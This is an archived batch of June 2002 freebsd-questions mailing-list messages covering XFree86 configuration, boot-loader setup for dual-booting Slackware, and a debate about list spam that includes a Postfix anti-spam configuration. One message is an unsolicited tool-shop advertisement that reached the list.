List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! Sorry, i'm not experienced with this. But the only thing which may b changed is mouse device. In FreeBSD sometime i was in need of /dev/sysmouse to work. And in Linux this is /dev/mouse (afair). I look through my XF86Config (But for X 4.2.0 on FBSD 4.3-RELEASE) and don't c anything else which may b OS-dependent. IMHO, You are in right direction. X is not part of OS (we r not in M$ world, what is great). Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 On Wed, 26 Jun 2002, Thomas Widlundh wrote: > Hi, > This might be a little off topic on this list, but... > Is the XF86Config file interchangeable between different types of > Unix/Linux OS's? > I have FreeBSD 4.5 with XFree86 3.3.6 and startx works as inspected. > I have Slackware 8.0 on the second HDD with exactly the same version > of > XFree86 3.3.6, but this will not start at all. And this on the very > same machine. > Can I just copy the BSD XF86Config file into Slackware? The file is > plain text and > XFree86 is not an OS, it's a tool for many Unix type OS's. Am I > thinking in the > wrong direction here? > As I wrote above, this is a BSD list, but I hope someone have some > experiences to share. > Thanks, > Thomas > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:22: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from matrix.zssm.zp.ua (matrix.zssm.zp.ua [212.8.32.10]) by hub.freebsd.org (Postfix) with ESMTP id 94BB837B405 for ; Wed, 26 Jun 2002 03:21:24 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by matrix.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5QAEao82634; Wed, 26 Jun 2002 13:14:36 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 19BE538302; Wed, 26 Jun 2002 13:21:54 +0300 (EEST) Date: Wed, 26 Jun 2002 13:21:54 +0300 (EEST) From: Alexander V Zubchenko To: Thomas Widlundh Cc: Lorin Lund , freeBSD Subject: Re: Lilo question In-Reply-To: <000101c21cf9$3d6f1640$34056dd4@chappe2> Message-ID: <20020626132011.F14619-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings again! /stand/sysinstall there custom install, 'allocate disk space' there give only the command 'W'rite and then You'll b prompted to choose what to write on MBR. Choose BootEasy and proceed. After reboot there must b 'Fx' prompts again. Hope this help, with best regards. Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 On Wed, 26 Jun 2002, Thomas Widlundh wrote: > > >I suppose you are referring to the multi-boot loader that is > >available with FreeBSD install. It isn't called Lilo but it > >can load slackware off of your second disk. > > > >You should see a menu listing F1 for your first bootable partition, > >F2 for your second bootable partition (on disk 1) ... and F5 to > >look at your second drive. > > > >You can use the multi-boot loader that comes with FreeBSD or > >you can use Lilo. I'm sure either one will work. > > > Hi again, > Earlier, with only one HDD and freeBSD only, I had this F1 showing up. > But now, after > having added a second HDD, there is no F1 at all. The loader just > starts with some > text about the loader itself, and finally there is a prompt. > Now I boot Slackware on the second HDD by a diskette, but I think it > would be nice > to be able to choose the OS I want to boot in the loader menu. But how > am I > achieving this? I've read about boot, loader, loader.conf, but I'm not > able to > figure it out. > > > 6/25/2002 3:56:18 PM, "Thomas Widlundh" wrote: > >>On my machine I have freeBSD on the first HDD and Slackware on the > >>second. > >>Can I somehow make the BSD Lilo to start the Slackware on disk 2 > >>(/dec/hdb)? > >>Should I let Slackware install its own lilo? > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:35: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from anchor-post-31.mail.demon.net (anchor-post-31.mail.demon.net [194.217.242.89]) by hub.freebsd.org (Postfix) with ESMTP id DDCEB37B400 for ; Wed, 26 Jun 2002 03:34:59 -0700 (PDT) Received: from caomhin.demon.co.uk ([62.49.21.186]) by anchor-post-31.mail.demon.net with esmtp (Exim 3.35 #1) id 17NA8Y-000GQ4-0V; Wed, 26 Jun 2002 11:34:58 +0100 Message-ID: Date: Wed, 26 Jun 2002 11:34:45 +0100 To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG From: Kevin Golding Subject: Re: I hate to bring it up again (spamming) References: <200206260922.34870.mark.rowlands@minmail.net> <20020626101156585.AAA781@empty1.ekahuna.com> In-Reply-To: <20020626101156585.AAA781@empty1.ekahuna.com> MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 U Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Someone, quite probably Philip J. Koenig, once wrote: >On 26 Jun 2002, at 9:22, Mark Rowlands boldly uttered: > >> On Wednesday 26 June 2002 1:00 am, Philip J. Koenig wrote: >> > As pointed out before, the problem is exacerbated by the unusual >> > scenario of 1) not requiring membership to post and 2) not blocking >> > file attachments by default. >> >> I rather think the presumption is that if your are smart enough to subscribe >> to freebsd-questions, you're smart enough to employ some local method to deal >> with spam. :-) > > >Actually you are making some incorrect assumptions, ie that everyone >is receiving individual messages, not digests. (I almost always >subscribe to list digests rather than individual messages) No idea if it's even possible but how about stripping attachments just from the digest? True it wouldn't eradicate the problem but surely that would at least reduce the load for digest users who can't filter spam. Kevin -- kevin@caomhin.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:43:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14303.mail.yahoo.com (web14303.mail.yahoo.com [216.136.173.79]) by hub.freebsd.org (Postfix) with SMTP id 89F1037B401 for ; Wed, 26 Jun 2002 03:43:31 -0700 (PDT) Message-ID: <20020626104331.28739.qmail@web14303.mail.yahoo.com> Received: from [210.49.151.41] by web14303.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 03:43:31 PDT Date: Wed, 26 Jun 2002 03:43:31 -0700 (PDT) From: Leo Huang Subject: RE: Problem in Installing FreeBSD 4.6 To: freebsd-questions@FreeBSD.ORG In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Thanks for your reply. Yes, I can run it under root now, but I find it can't run in other accounts. It will report cannot connect X server. How should I solve it then? Regards, Leo --- jogegabsd wrote: > > Hi, > > > > I tried to install 4.6 on my Laptop, Compaq > Presario > > 1700 XL461. I meet a problem when I was setting > the > > XFree86 Server 4.2.0. > > > > When I used the xf86cfg to config my graphic card, > ATI > > Rage 128 Mobil, I couldn't find any ATI graphic > card > > in the card list. But I noticed that the driver is > > "ati", which is exactly the same as what > > http://www.freebsd.org said. But however, when I > used > > "startx" and tried to start X Windows, KDE, it > always > > reported the video card error. > > > > I want to know how to solve this problem? Why my > > graphic card was not on the list? I can use > FreeBSD > > 4.5 with KDE very well, unless it doesn't support > my > > sound card, which is not important. > > I had the same problem with my compaq 1700T. > Try the "XFree86 -configure" command. This will > generate you > an XFree configuration file with the exact Video > Card > Configuration, even with DRI(I think), the move this > file > to the /etc/X11/ and edit it to add the extra > features you > want. Depth, Resolution, etc. > Any other problem in you laptop, don't hesitate and > mail me, > I'll be glad to help. > > HTH > > Gerardo Amaya > __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:11:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by hub.freebsd.org (Postfix) with ESMTP id 479A237B400 for ; Wed, 26 Jun 2002 04:11:20 -0700 (PDT) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 54C5DEF6A4 for ; Wed, 26 Jun 2002 13:10:51 +0200 (CEST) Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 434005D00F for ; Wed, 26 Jun 2002 13:13:23 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id DEFCB5D008 for ; Wed, 26 Jun 2002 13:13:17 +0200 (CEST) Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A1F816200A0; Wed, 26 Jun 2002 13:14:00 +0200 Message-Id: <5.1.0.14.2.20020626054311.02d89ca8@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 06:11:05 -0500 To: freebsd-questions@freebsd.org From: Len Conrad Subject: Re: I hate to bring it up again (spamming) In-Reply-To: References: <20020626101156585.AAA781@empty1.ekahuna.com> <200206260922.34870.mark.rowlands@minmail.net> <20020626101156585.AAA781@empty1.ekahuna.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >No idea if it's even possible but how about stripping attachments just >from the digest? > >True it wouldn't eradicate the problem but surely that would at least >reduce the load for digest users who can't filter spam. IMGate is postfix configured as anti-abuse relay. Several 100 ISP's and other orgs find it extremely effective at reducing spam at the edge. I don't bother to filter the crumbs that make it to my desktop. here are the postfix main.cf that reduce spam. maps_rbl_domains = blackholes.wirehub.net, dynablock.wirehub.net, sbl.spamhaus.org, relays.ordb.org, spews.relays.osirusoft.com, formmail.relays.monkeys.com, proxies.relays.monkeys.com, socks.relays.osirusoft.com, bl.spamcop.net, orbs.dorkslayers.com, dialups.relays.osirusoft.com, spamsites.relays.osirusoft.com, spamhaus.relays.osirusoft.com, korea.services.net, ipwhois.rfc-ignorant.org smtpd_recipient_restrictions = reject_unauth_pipelining, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, permit_mynetworks, reject_unauth_destination, hash:/etc/postfix/to_recipients.map, check_sender_access hash:/etc/postfix/from_senders.map, check_sender_access hash:/etc/postfix/spamlist-extended.txt, check_sender_access hash:/etc/postfix/bogus_from_senders.map, check_hostname_access hash:/etc/postfix/helo_hostnames.map, reject_unknown_hostname, reject_invalid_hostname, reject_non_fqdn_hostname, check_client_access hash:/etc/postfix/mta_clients.map, reject_maps_rbl, permit header_checks = regexp:/etc/postfix/header_checks.regexp body_checks = regexp:/etc/postfix/body_checks.regexp smtpd_helo_required = yes strict_rfc821_envelopes = yes # disable_vrfy_command = yes smtp_always_send_ehlo = yes biff = no In the the various "hostname" checks are pretty useless since they produce too many false positives. New restrictions that have added a significant increment in rejects are check_sender_access hash:/etc/postfix/spamlist-extended.txt, ... is a frequently updated list from http://basic.wirehub.nl/spamlist-extended.txt of envelope senders used by spammers. check_sender_access hash:/etc/postfix/bogus_from_senders.map ... is a list of 4000+ @sender.domains, frequently forged by spammers. The list is at http://www.monkeys.com/anti-spam/filtering/sender-domain-validate.in When these enevlope @sender.domains are alleged in the envelope, postfix will require that the ip of the sending MTA have PTR and A records that exist + match. For an ISP in LA with about 25k msgs/day, here are his rejects for one day last week: 11 ACL header checks 13 SMTP invalid sender@sender.domain 25 RBL socks.relays.osirusoft.com 38 RBL dynablock.wirehub.net 51 RBL orbs.dorkslayers.com 64 SMTP unauthorized pipelining 79 RBL relays.visi.com 97 RBL blackholes.wirehub.net 104 ACL unauthorized relay 293 RBL relays.ordb.org 496 RBL proxies.relays.monkeys.com 506 ACL body checks 704 DNS no A/MX for @recipient.domain 1441 ACL sender@sender.domain 1453 DNS nxdomain for MTA PTR hostname 2230 DNS no A/MX for @sender.domain 2441 DNS timeout for MTA PTR hostname 10046 TOTAL The "MTR PTR" lines are produced by the bogus_from_senders check. The problem with the spam in the FreeBSD lists is that FreeBSD's outbound MTA's don't trigger any filters at the gateway level, so the FreeBSD list members are pretty much stuck with fighting it on their desktop, since the gateways let it through. So the key is for FreeBSD.org to try to keep it out of their MX's. I hope some of the rules above, if used by FreeBSD.org, would provide an large increment of rejections. The list-subscription requirement is useless, since the spammers can easily harvest list members names for use as forged envelope senders. Len www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com : ISC BIND for NT4 & W2K IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:12: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 5839D37B408 for ; Wed, 26 Jun 2002 04:11:46 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Wed, 26 Jun 2002 04:11:42 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: Kevin Golding Date: Wed, 26 Jun 2002 04:11:44 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: I hate to bring it up again (spamming) Reply-To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG In-reply-to: References: <20020626101156585.AAA781@empty1.ekahuna.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020626111142993.AAA791@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 26 Jun 2002, at 11:34, Kevin Golding boldly uttered: > Someone, quite probably Philip J. Koenig, once wrote: > >On 26 Jun 2002, at 9:22, Mark Rowlands boldly uttered: > > > >> On Wednesday 26 June 2002 1:00 am, Philip J. Koenig wrote: > >> > As pointed out before, the problem is exacerbated by the unusual > >> > scenario of 1) not requiring membership to post and 2) not blocking > >> > file attachments by default. > >> > >> I rather think the presumption is that if your are smart enough to subscribe > >> to freebsd-questions, you're smart enough to employ some local method to deal > >> with spam. :-) > > > > > >Actually you are making some incorrect assumptions, ie that everyone > >is receiving individual messages, not digests. (I almost always > >subscribe to list digests rather than individual messages) > > No idea if it's even possible but how about stripping attachments just > from the digest? > > True it wouldn't eradicate the problem but surely that would at least > reduce the load for digest users who can't filter spam. You mean at the listserver side? Good question, but if I were to hazard a guess I'd think that would require some sort of special customization, the manpower for which may not be available. Whereas it would seem that simply adding some rules to the existing filtering scheme to reject messages with attachment filenames ending in .scr|.pif|.bat|.com|.exe|.vbs would be relatively trivial, for example. (and I can't imagine why any such attachments would have much usefulness in this list) Neither does blocking attachments to digest subscribers address all the extra gigabytes of junk being spread around the world to non- digest subscribers every time someone sends another few 100k viruses to the list. (1GB for every 5 100k viruses sent to the list, assuming only 50% of the reputed ~4000 list subscribers are receiving separate messages) -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:19:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.rubix.net.au (mail.rubix.net.au [203.55.153.249]) by hub.freebsd.org (Postfix) with ESMTP id D299F37B400 for ; Wed, 26 Jun 2002 04:18:44 -0700 (PDT) Received: from Luke (du12.rubix.net.au [203.55.153.12]) by mail.rubix.net.au (8.9.3/8.9.3) with ESMTP id RAA14342; Wed, 26 Jun 2002 17:16:31 +1000 From: "Just Tools" To: Subject: Quality Tools & Service Date: Wed, 26 Jun 2002 17:18:28 +1000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0004_01C21D36.AFB7E820" X-Priority: 1 (Highest) X-MSMail-Priority: High X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: High X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Disposition-Notification-To: "Just Tools" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0004_01C21D36.AFB7E820 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Dear Sir/Madam, We would like to introduce our business to you as a supplier of hand and power tools for yourself or your workshop/maintenance department. Just Tools has been trading in South Melbourne for the past 28 years. We cater for the trade, handyman and the manufacturer. We stock many well known brands such as: Makita , Hitachi, Bosch, Kango, Metabo, Black & Decker, Dewalt, Endeavour & Puma Air Tools , Compressors, Sidchrome, Stanley, Sandvik, Sutton (Drills), Kincrome, Dawn Vices, Record . The range is too broad to mention them all here. As specialists in tools only, Just Tools has one of the largest and most comprehensive range of quality tools in Melbourne. We have been supplying a wide range of businesses various hand and power tool requirements for some years now & also directly to the various job sites. JUST TOOLS is one of the largest power tool suppliers in Australia . We purchase large volume of tools from the manufacturers which enable us to pass down the saving to our buyers. That means, there are more savings for you! JUST TOOLS, is a member of United Tools of the Trade & Tool Specialists Co-Op Ltd buying groups. Combined buying strength of 22 Stores, gives you the customer greater savings throughout. We have over 20,000 items stocked in our retail outlet & many more being added to our website weekly. Feel free to visit our online 'secure' shopping experience at www.justtools.com.au & 'End of Financial Year' catalogue. Just Tools 180 Clarendon St, South Melbourne VIC 3205 Ph: (03) 9696 5722 Fax: (03) 9696 5607 Email: tools@justtools.com.au Web: www.justtools.com.au ======================================================================== =================== Disclaimer This document is confident and may contain legally privileged information. If you are not the intended recipient you may not read, copy, distribute or act on reliance on it. Please destroy it and kindly notify the sender by reply email. You should check this message and any attachments for viruses or defects. Our liability is limited to resupplying any affected message or attachments. ======================================================================== =================== ------=_NextPart_000_0004_01C21D36.AFB7E820 Content-Type: text/html; charset="Windows-1252" Content-Transfer-Encoding: quoted-printable Message

Dear Sir/Madam,

 

We=20 would like to introduce our business to you as a supplier of hand = and power tools for yourself or your=20 workshop/maintenance department. =20

Just Tools has = been trading in=20 South Melbourne=20 for the past 28 years. We = cater for=20 the trade, handyman and the manufacturer.

 

We=20 stock many well known brands such as:

Makita ,=20 Hitachi,=20 Bosch, = Kango,=20 Metabo, Black & = Decker, Dewalt, Endeavour & Puma Air = Tools ,=20 Compressors, Sidchrome,=20 Stanley, = Sandvik, Sutton (Drills), Kincrome, = Dawn=20 Vices, Record . = The range is too broad to mention them all here.=20

 

As=20 specialists in tools only, Just Tools has one of the largest and most=20 comprehensive range of quality tools in = Melbourne.

We have been=20 supplying a wide range of = businesses=20 various hand and power tool requirements for some years now & also directly to the various = job=20 sites.

  

JUST=20 TOOLS is one = of the=20 largest power tool suppliers in Australia . = We purchase large volume of tools from the manufacturers = which enable=20 us to pass down the saving to our buyers. That means, there are more = savings for=20 you!

JUST TOOLS, is a=20 member of United Tools of the Trade & Tool Specialists Co-Op Ltd = buying=20 groups. Combined buying strength of 22 Stores, gives you the customer = greater=20 savings throughout. We have=20 over 20,000 items stocked = in our=20 retail outlet & many more being = added to our=20 website weekly.

Feel free to=20 visit our online 'secure' shopping experience at www.justtools.com.au  & 'End of = Financial=20 Year' = catalogue.

Just Tools
180 Clarendon St, South Melbourne VIC=20 3205

Ph:   (03) 9696=20 5722
Fax: =20 (03) 9696 5607


Email: tools@justtools.com.au
Web:  www.justtools.com.au


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Disclaimer
This document is confident and = may contain=20 legally privileged information. If you are not the intended recipient = you may=20 not read, copy, distribute or act on reliance on it. Please destroy it = and=20 kindly notify the sender by reply email. You should check this message = and any=20 attachments for viruses or defects. Our liability is limited to = resupplying any=20 affected message or attachments.

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=

 
------=_NextPart_000_0004_01C21D36.AFB7E820-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:30: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail2.caramail.com (mail2.caramail.com [213.193.13.93]) by hub.freebsd.org (Postfix) with ESMTP id E94C737B400 for ; Wed, 26 Jun 2002 04:29:51 -0700 (PDT) Received: from caramail.com (www36.caramail.com [213.193.13.46]) by mail2.caramail.com (8.8.8/8.8.8) with SMTP id NAA09832 for freebsd-questions@FreeBSD.ORG; Wed, 26 Jun 2002 13:29:49 +0200 (DST) Posted-Date: Wed, 26 Jun 2002 13:29:49 +0200 (DST) From: nicolas jullia To: freebsd-questions@FreeBSD.ORG Message-ID: <1025090989025908@caramail.com> X-Mailer: Caramail - www.caramail.com X-Originating-IP: [217.128.234.117] Mime-Version: 1.0 Subject: a quesion of compatibility Date: Wed, 26 Jun 2002 13:29:49 GMT+1 Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0259081025090989_ID" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --=_NextPart_Caramail_0259081025090989_ID Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit heelo i would say if my videocard was supported by the new realese of freeBsd I have an Creative Labs Banshe on agp slot with 16 Mo of ram. I have another question to find freeBsd 4.6 in french on a cd. thank you nicolas _________________________________________________________ Envoyez des messages musicaux sur le portable de vos amis http://mobile.lycos.fr/mobile/local/sms_musicaux/ --=_NextPart_Caramail_0259081025090989_ID-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:44:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (oe36.law8.hotmail.com [216.33.240.93]) by hub.freebsd.org (Postfix) with ESMTP id EBF8537B407 for ; Wed, 26 Jun 2002 04:44:10 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 26 Jun 2002 04:44:10 -0700 X-Originating-IP: [193.108.81.36] From: "Sean Cardus" To: Subject: RE: FreeBSD 4.6-RELEASE is now available Date: Wed, 26 Jun 2002 12:44:14 +0100 Message-ID: <00e101c21d06$cbfab650$24516cc1@zebra.co.uk> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <200206152334.g5FNYQgJ003134@intruder.bmah.org> X-OriginalArrivalTime: 26 Jun 2002 11:44:10.0580 (UTC) FILETIME=[C9676140:01C21D06] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > FreeBSD 4.6-RELEASE supports the i386 and alpha architectures and can > be installed directly over the net using the boot floppies or copied > to a local NFS/FTP server. Distributions for the i386 are available > now. Final builds for the alpha architecture are in progress and will > be made available shortly. I've noticed the alpha ISO's have appeared on ftp.freebsd.org, but I've not seen any official announcement regarding the actual alpha release. Are the ISO images that are currently available the final 4.6-RELEASE build?... TIA, Sean To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 4:55: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id DCB1137B400 for ; Wed, 26 Jun 2002 04:54:53 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5QBrmr14791; Wed, 26 Jun 2002 07:53:48 -0400 Message-ID: <3D19ACC6.6010807@potentialtech.com> Date: Wed, 26 Jun 2002 08:00:06 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: pjklist@ekahuna.com Cc: Kevin Golding , questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) References: <20020626101156585.AAA781@empty1.ekahuna.com> <20020626111142993.AAA791@empty1.ekahuna.com@pc02.ekahuna.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Would you folks kindly mind taking this to -chat or some other place? You state the spam problems looks bad to new members of the community, and yet this incessant argument looks worse to people joining this list than anything else. This discussion DOES NOT belong on this list. Philip J. Koenig wrote: > On 26 Jun 2002, at 11:34, Kevin Golding boldly uttered: > > >>Someone, quite probably Philip J. Koenig, once wrote: >> >>>On 26 Jun 2002, at 9:22, Mark Rowlands boldly uttered: >>> >>> >>>>On Wednesday 26 June 2002 1:00 am, Philip J. Koenig wrote: >>>> >>>>>As pointed out before, the problem is exacerbated by the unusual >>>>>scenario of 1) not requiring membership to post and 2) not blocking >>>>>file attachments by default. >>>> >>>>I rather think the presumption is that if your are smart enough to subscribe >>>>to freebsd-questions, you're smart enough to employ some local method to deal >>>>with spam. :-) >>> >>> >>>Actually you are making some incorrect assumptions, ie that everyone >>>is receiving individual messages, not digests. (I almost always >>>subscribe to list digests rather than individual messages) >> >>No idea if it's even possible but how about stripping attachments just >>from the digest? >> >>True it wouldn't eradicate the problem but surely that would at least >>reduce the load for digest users who can't filter spam. > > > > You mean at the listserver side? Good question, but if I were to > hazard a guess I'd think that would require some sort of special > customization, the manpower for which may not be available. > > Whereas it would seem that simply adding some rules to the existing > filtering scheme to reject messages with attachment filenames ending > in .scr|.pif|.bat|.com|.exe|.vbs would be relatively trivial, for > example. (and I can't imagine why any such attachments would have > much usefulness in this list) > > Neither does blocking attachments to digest subscribers address all > the extra gigabytes of junk being spread around the world to non- > digest subscribers every time someone sends another few 100k viruses > to the list. (1GB for every 5 100k viruses sent to the list, assuming > only 50% of the reputed ~4000 list subscribers are receiving separate > messages) > > > > -- > Philip J. Koenig pjklist@ekahuna.com > Electric Kahuna Systems -- Computers & Communications for the New Millenium > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:39:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from msw.pchome.com.tw (msw.pchome.com.tw [211.20.188.140]) by hub.freebsd.org (Postfix) with SMTP id 5853837B401 for ; Wed, 26 Jun 2002 05:39:07 -0700 (PDT) Received: (qmail 7373 invoked from network); 26 Jun 2002 12:39:05 -0000 Received: from u14-163.u61-70.giga.net.tw (HELO workstation) (61.70.14.163) by msw.pchome.com.tw with SMTP; 26 Jun 2002 12:39:05 -0000 Message-ID: <000801c21d0e$bb2bc230$124ffea9@workstation> From: "mickey" To: Subject: when 32-bit card bus can support? Date: Wed, 